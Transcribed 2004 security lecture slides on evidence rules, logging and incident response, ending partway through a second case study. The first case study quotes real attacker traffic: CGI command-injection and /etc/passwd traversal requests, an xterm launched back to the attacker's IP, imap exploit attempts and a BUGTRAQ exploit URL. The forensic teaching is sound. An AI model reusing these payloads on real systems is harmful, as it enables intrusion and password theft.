csci e-170: november 30, 2004 administrivia federal rules of evidence logging integrity management
DESCRIPTION
CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management. Administrivia. Project Proposals are due today Who is in your group? What are you doing? Not graded Quiz #2: You will be given 4 papers and expected to write a page on each. Administrivia 2. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/1.jpg)
CSCI E-170: November 30, 2004
AdministriviaFederal Rules of EvidenceLoggingIntegrity Management
![Page 2: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/2.jpg)
Administrivia
Project Proposals are due today– Who is in your group?– What are you doing?– Not graded
Quiz #2: You will be given 4 papers and expected to write a page on each.
![Page 3: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/3.jpg)
Administrivia 2
Some students have not turned in any work to date…. – Think about dropping the course.
Students who do not turn in a final project will fail.
![Page 4: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/4.jpg)
Federal Rules of Evidence
9 Articles Many states follow FRE Codifies common law
Why study them?
![Page 5: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/5.jpg)
Article I: Ground Rules
Rule 101 - Scope– Rule 1101 - Does not apply to preliminary
questions of fact, grand jury, miscellaneous proceedings
Rule 102 - Purpose:– Fairness– Eliminate unjustifiable expense and delay
Rule 103 - Rulings on Evidence– What to do when opposing parties disagree.
![Page 6: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/6.jpg)
Article II: JUDICIAL NOTICE
Every case involves the use of hundres or thousands of non-evidence facts
When a witness says “car,” eveyone assumes that the “car” is an automobile, not a railroad car, that it is self-propelled, and so on.
![Page 7: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/7.jpg)
ARTICLE III: PRESUMPTIONS IN CIVIL ACTIONS AND PROCEEDINGS Determines who has the burden of
rebutting the evidence. Presumption imposes on the party
against whom it is directed the burden of going forward with evidence to rebut or meet the presumption
![Page 8: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/8.jpg)
ARTICLE IV: RELEVANCY AND ITS LIMITS Relevant evidence is admissible Irrelevant Evidence is inadmissible Evidence that wastes time can be excluded Character evidence of defendant not
admissible to prove conduct (unless introduced by defendant)
Character evidence of victim introduced only in homicide case to rebut evidence that alleged victim was first aggressor
Rule 412 - “rape shield” law
![Page 9: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/9.jpg)
ARTICLE V: PRIVILEGES
“…may be interpreted by the courts of the United States in light of reason and experience”
![Page 10: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/10.jpg)
ARTICLE VI: WITNESSES
Rule 601: Every person is competent to be a witness (except as otherwise provided)
Rule 602: Witness must have personal knowledge
Rule 605: Judge cannot testify as witness Rule 606: Juror may not testify as witness Rule 612: Adverse party is entitled access to
“writing used to refresh memory”
![Page 11: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/11.jpg)
ARTICLE VII: OPINIONS AND EXPERT TESTIMONY Rule 701: Law Witness may not testify based
on “scientific, technical, or other specialized knowledge”
Rule 702: Experts must be qualified; use reliable principles and methods; witness must apply standards to this case.
Rule 704: Experts may state an opinion of the “ultimate issue,” except for matters of mental state.
![Page 12: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/12.jpg)
ARTICLE VIII: HEARSAY
Rule 801: “Hearsay” is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted.
Many, many exceptions to hearsay…– 803(5) - Recorded Recollection– 803(6) - Records of regularly conducted activity– 803(7) Absence of entry in records kept in
accordance with 803(6) “to prove nonoccurance or nonexistence”
![Page 13: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/13.jpg)
ARTICLE IX: AUTHENTICATION AND IDENTIFICATION
Rule 901: Documents must be authenticated; many examples given
Rule 902: Some documents are self-authenticating; (computer records aren’t)
![Page 14: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/14.jpg)
ARTICLE X: CONTENTS OF WRITINGS, RECORDINGS, AND PHOTOGRAPHS
Rule 1002: Originals are required, except where duplicates may be admitted.
Rule 1003: Duplicates may be admitted unless genuine questions are raised about the authenticity or in “unfair” circumstances.
What is an original computer record?
![Page 15: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/15.jpg)
ARTICLE XI: MISCELLANEOUS RULES Rule 1101: Applicability Rule 1102: Amendments Rule 1103: Title
![Page 16: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/16.jpg)
Orin S. Kerr article
What’s the point? What are “Records of regularly conducted
activity?” Are computer records “monolithic?” How do you Authenticate computer records?
How are they challenged? When do the Hearsay rules apply?
– What’s the deal with postings from websites of white supremacist groups?
– What about email in a harassment case?
![Page 17: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/17.jpg)
What is a log?
Definition?
Unix vs. Windows?
Palm?
![Page 18: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/18.jpg)
What gets logged?
![Page 19: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/19.jpg)
What gets logged?
Logins / logouts Privilege escalation Security relevant events
![Page 20: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/20.jpg)
What goes in a log?
![Page 21: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/21.jpg)
Why keep logs?
![Page 22: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/22.jpg)
Why look at logs? (Marcus)
Policy Legality Cost saving
![Page 23: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/23.jpg)
Common mistakes (Marcus)
#1 – collecting it and not looking at it (might as well log to /dev/null)
#2 – watching logs from perimeter systems while ignoring internal systems
#3 – Designing your log architecture before you decide what you’re going to collect
#4 – Only looking for what you know you want to find instead of just looking to see what you find.
![Page 24: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/24.jpg)
Common Mistakes 2:
#5 – Proceeding without doing envelope estimates with of load.
#6 – thinking your logs are evidence if you don’t collect them right
#7 – forgetting that this is just a data management problem
#8 – Drinking the XML Kool-ade
![Page 25: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/25.jpg)
How are things logged?
f = fopen(“logfile”,”w+”) syslog() Logger
![Page 26: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/26.jpg)
Web Logs
access_log vs. error_log 65.54.188.137 - - [30/Nov/2004:00:16:54 -
0500] "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)"
66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"
![Page 27: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/27.jpg)
Web logs…grep 'q=' ~www/simson.net/logs/access_log | sed 's/^.*q=//' | awk '{print $1;}' | head smart+identity+card&client=disney-go&start=10" simson&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N" backing+up+raid+drives&hl=en&lr=&ie=UTF-8&oe=UTF-
8&start=10&sa=N" lzhuf&hl=en&lr=&ie=UTF-8&start=40&sa=N" brown+simson&FORM=SMCRT" %22home+wiring%22&_sb_lang=en" %22wireless+photo+album%22&lr=" lzhuf+public+domain&hl=en&lr=&ie=UTF-8&start=10&sa=N" simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta=" simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="
![Page 28: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/28.jpg)
Mail Logs
2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknow
n user 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234]
F=<[email protected]> rejected RCPT <[email protected]>: Unkno wn user
![Page 29: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/29.jpg)
Radius Logs Sun Mar 18 04:35:24 2001
Acct-Session-Id = "00000000” NAS-IP-Address = 192.168.1.5 Acct-Status-Type = Stop Acct-Session-Time = 0 Acct-Delay-Time = 0 Timestamp = 984918924 Request-Authenticator = Verified
Sun Mar 18 04:35:24 2001 Acct-Session-Id = "06000004” User-Name = "admin” NAS-IP-Address = 192.168.1.5 Acct-Status-Type = Start Acct-Authentic = Local Service-Type = Administrative-User Login-Service = Telnet Login-IP-Host = 192.168.1.1 Acct-Delay-Time = 75 Timestamp = 984918924 Request-Authenticator = Verified
![Page 30: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/30.jpg)
Security Incidents: Strange Authentication Attempts I woke up to find these entries in my RADIUS log file:
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/system] (from nas xxxx/S99) Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/password admin] (from nas xxxx/S99) Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/13370n3z] (from nas xxxx/S99) Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/fawkoffsz] (from nas xxxx/S99) Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/save] (from nas xxxx/S99)
http://seclists.org/lists/incidents/2004/Mar/0116.html
![Page 31: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/31.jpg)
Log architectures
UDP log issues Windows
![Page 32: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/32.jpg)
Logging on Unix
/etc/syslog.conf /etc/newsyslog.conf Grep swatch
![Page 33: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/33.jpg)
Logging on Windows:
Event Viewer Local security settings
![Page 34: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/34.jpg)
Log hosts & Aggregation
![Page 35: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/35.jpg)
Can you trust these logs?
![Page 36: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/36.jpg)
October 7th, 1997
6:00pm– Arrive hotel in New York City.– Phone system does not support my
modem.– Cell phone reception is terrible.
8:45pm– Phone call from Eric Bates.– “I think that we have a visitor.”
![Page 37: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/37.jpg)
Wed October 7th, 1997
User http is logged in on ttyp0 and idle for one day:
bash-2.02# w 8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35USER TTY FROM LOGIN@ IDLE WHAThttp p0 KRLDB110-06.spli Tue02AM 1days /bin/shsimsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh)ericx p2 mac-ewb.vineyard 8:46PM 0 scriptericx p3 mac-ewb.vineyard 8:46PM 11 topericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5bash-2.02#
(Other employees had seen this and ignored it!)
![Page 38: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/38.jpg)
First step: Document the machine script(1) to create a transcript
– ps process list– netstat -a open network connections– (lsof) open files– grep ‘krldb’ access_log likely avenue of attack
Goals:– Don’t alarm intruder.– Find mechanism of access– Find out what he/she did.– Plug the holes.
![Page 39: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/39.jpg)
ps - processes
Attacker only had two processes– /bin/sh on /dev/ttyp0 (2 copies)
PID 18671 and 26225
– Idle since 2AM the previous day.
walden: {336} % grep p0 plist
http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.07 /bin/sh
walden: {337} %
![Page 40: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/40.jpg)
netstat - network connections
“w” gave incomplete hostname:– KRLDB110-06.spli
netstat revealed one connection -- x11!bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
. . .
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
Use netstat –n to get IP address, from which you can get the full DNS name.
![Page 41: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/41.jpg)
access_log - showed attack
Grep krldb /usr/local/apache/logs/access_log
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva“
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva“
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
![Page 42: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/42.jpg)
Attacker GETs
GET /cgi-bin/phf?Qname=me%0als%20-lFaGET /cgi-bin/faxsurvey?ls%20-lFaGET /cgi-bin/view-source?../../../../../../../../etc/passwdGET /cgi-bin/htmlscript?../../../../../../../../etc/passwdGET /cgi-bin/campas?%0als%20-lFaGET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=DownloadGET /cgi-bin/php.cgi?/etc/passwdGET /cgi-bin/faxsurvey?ls%20-lFaGET /cgi-bin/faxsurvey?uname%20-aGET /cgi-bin/faxsurvey?idGET /cgi-bin/faxsurvey?cat%20/etc/passwdGET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/GET /cgi-bin/faxsurvey?idGET /cgi-bin/faxsurvey?pwdGET /cgi-bin/faxsurvey?/bin/pwdGET /cgi-bin/faxsurvey?ls%20-lFaGET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/
![Page 43: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/43.jpg)
Facts so far
It looks like the faxsurvey program allowed attacker to run arbitrary programs.
No evidence that he ran xterm --- except for the X11 connection back to his machine.
We don’t know what he did or what else he knows.
![Page 44: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/44.jpg)
Action plan
1. Add filter to router to block all access from splitrock (his ISP).
2. STOP his processes and gcore them to get command history.
• kill -STOP PIDs• gcore -c file pid• strings file
3. Rename/remove the faxsurvey program (part of hylafax system).
![Page 45: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/45.jpg)
Selected Environment variablesfrom /bin/sh #1:GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
REMOTE_ADDR=209.156.113.121
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
LOGNAME=http
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
DISPLAY=209.156.113.121:0.0
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
![Page 46: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/46.jpg)
History from /bin/sh #1:
st2.c
cron.c
cxterm.c
x2.c
qpush.c
cat t.c
cat .c
cat s.c
gc c
ls -lFa
./s -v c2
./s p0
ls -lFa /
cat .s
ls -lFa
cat /w
ls -lFa /
cat .s
_=.s$ : not foundgcc -o s steal.cls -lFa *.cgcc -o s s.cftp 209.156.113.121gcc -o s st2.c./s consolet .s.121qpush.cppp.ct2.ccron.ccxterm.ctcshx2.cREADMEREADME.debian
qpushqpush.cqpush.c.oldgf: not found/tmpmfs:28/bin/sh
…Looks like the attacker was trying to get some sort of root-stealing exploit for Linux (or Debian Linux) to work on the machine.
![Page 47: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/47.jpg)
Selected history from /bin/sh #2:/bin/sh/bin/sh/etc/inetd.confqpush.c/usr/bin/gccn/gcc./ccexprdone/bin/shinetd.conft) | telnet 127.1 143cd /etccat .swhich pwdls -lFaexpr $L + 1ls -lFa./cc -10./cc
Attacker sees that we are running imap
![Page 48: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/48.jpg)
Selected history from /bin/sh #2:./cc/tmp/.s/tmpcd /tmpcd .sL=100cd .sL=-100ls -lFacd /tmp/bin/sh./q 127.1load/bins_=127.1_=/bins./cc./cc -92./cc -100./cc 100cat .s./cx
Attempts to exploitimap vulnerability
![Page 49: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/49.jpg)
Selected history from /bin/sh #2:cat .sexport L_=.scat /etc/passwd |grep "root"DISPLAY=209.156.113.121:0.0 -rvgdsgDISPLAY=209.156.113.121:0.0cat /etc/passwd |Grep "http"cat /etc/passwd |grep "http"cat /etc/passwd |grep "www"while [ $: done2 $Lecho $L(./i 403 0xefbfd5e8 100; cat) |nc 127.1 143cx $L$L +1`(./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143echo./cc $LL=`expr $L + 1`
Tries again for imap
Searching for accountsand passwords…
![Page 50: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/50.jpg)
Selected history from /bin/sh #2:unameftp 209.156.113.121mv pp.c p.cls -lFa mas*ls -lFa /etc |grep "mas"cat master.passwdtelnet 127.1 25locate modstatwhich modstatls -lFa /usr/bin/mo*locate modstatelocateico s.clocate modloadgrepftp wildsau.idv.uni-lkii-lkicat /etc/inetd.conf./q -0 127.1cat /etc/inetd.coinfftp 209.156.113.121gcc -o cc cron.cftp 209.156.113.121gcc -o cx cxterm.c
Tries again for sendmail
Tries for shadow passwordfile
Tries for linux kernel module loader
And so on…
![Page 51: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/51.jpg)
Epilogue
We spoke with Splitrock– They didn’t seem to care (Splitrock is a prodigy
dialup port in Texas.)– Eventually we were forced to lower the block.
FBI didn’t care– This guy is clearly good…– But we didn’t have more than $8,000 in damages.
Vulnerability in faxsurvey had been reported July 29, 1998 – nearly three months before incident!
![Page 52: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/52.jpg)
BUGTRAQ Report
Date: Tue, 4 Aug 1998 07:41:24 -0700Reply-To: [email protected]: Tom <[email protected]>Subject: remote exploit in faxsurvey cgi-script
Hi!
There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker toexecute any command s/he wants with the permissions of the HTTP-Server.
All the attacker has to do is type"http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"in his favorite Web-Browser to get a copy of your Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with theHylaFAX package installed are vulnerable to this attack.
AFAIK the problem exists in the call of 'eval'.
I notified the S.u.S.E. team (suse.de) about that problem. BurchardSteinbild <[email protected]> told me, that they have not enough time to fix thatbug for their 5.3 Dist., so they decided to just remove the script from thefile list.
![Page 53: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/53.jpg)
Epilogue 2
Follow security advisories.– Hard to do.
Don’t let http:– run gcc– read /usr/include
![Page 54: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/54.jpg)
Detecting attacks with MRTG
Developed by – Tobias Oetiker <[email protected]>– Dave Rand <[email protected]>
Designed to graph bandwidth of connections
Useful for graphing any value that changes over time.
![Page 55: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/55.jpg)
Typical MRTG uses
T1 utilization:
Dialup utilization:
![Page 56: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/56.jpg)
More MRTG uses:
CPU utilization:
GIF response time:
![Page 57: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/57.jpg)
MRTG shows changes over time Hourly
Daily
Weekly
Monthly
![Page 58: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/58.jpg)
May 19, 1998
10:00 am– Meeting in Washington DC at the FBI.
3:30pm – Get on train from Washington -> Boston
(8 hour train ride - good chance to relax.) 4:30pm
– Call on cell phone from Aaron
![Page 59: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/59.jpg)
Things are acting strange…
Single server– WWW, POP, IMAP, etc.
CGI scripts terminating abnormally. POP server sometimes disconnecting
before e-mail is downloaded. Finger doesn’t work quite right. Rest of Internet seems normal.
![Page 60: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/60.jpg)
What’s wrong?
No clue… Reboot the computer! Problem goes away for 30 minutes,
then comes back…
![Page 61: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/61.jpg)
Process list looks normal…
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMANDsimsong 1770 86.4 2.0 5184 5212 p3 R 5:34PM 4:47.73 /usr/local/bin/perl
/usr/local/bin/report.www -v (report.www)root 24659 31.4 0.0 0 0 ?? Z 4:19PM 0:00.00 (admin_server)root 2345 2.0 0.1 220 284 ?? S 31Dec69 0:00.02 (ping)root 1406 0.0 0.0 0 0 ?? Z 5:32PM 0:00.00 (junkbuster)root 0 0.0 0.0 0 0 ?? DLs Mon01PM 0:00.30 (swapper)root 1 0.0 0.1 148 288 ?? Ss Mon01PM 0:01.63 /sbin/initroot 2 0.0 0.0 0 12 ?? DL Mon01PM 0:00.01 (pagedaemon)root 15 0.0 0.0 68 64 ?? Is Mon01PM 0:00.00 asyncd 2root 17 0.0 0.0 68 64 ?? Is Mon01PM 0:00.02 asyncd 2root 26 0.0 0.8 748 2008 ?? Ss Mon01PM 0:00.67 mfs -o rw -s 40960 /dev/sd0b
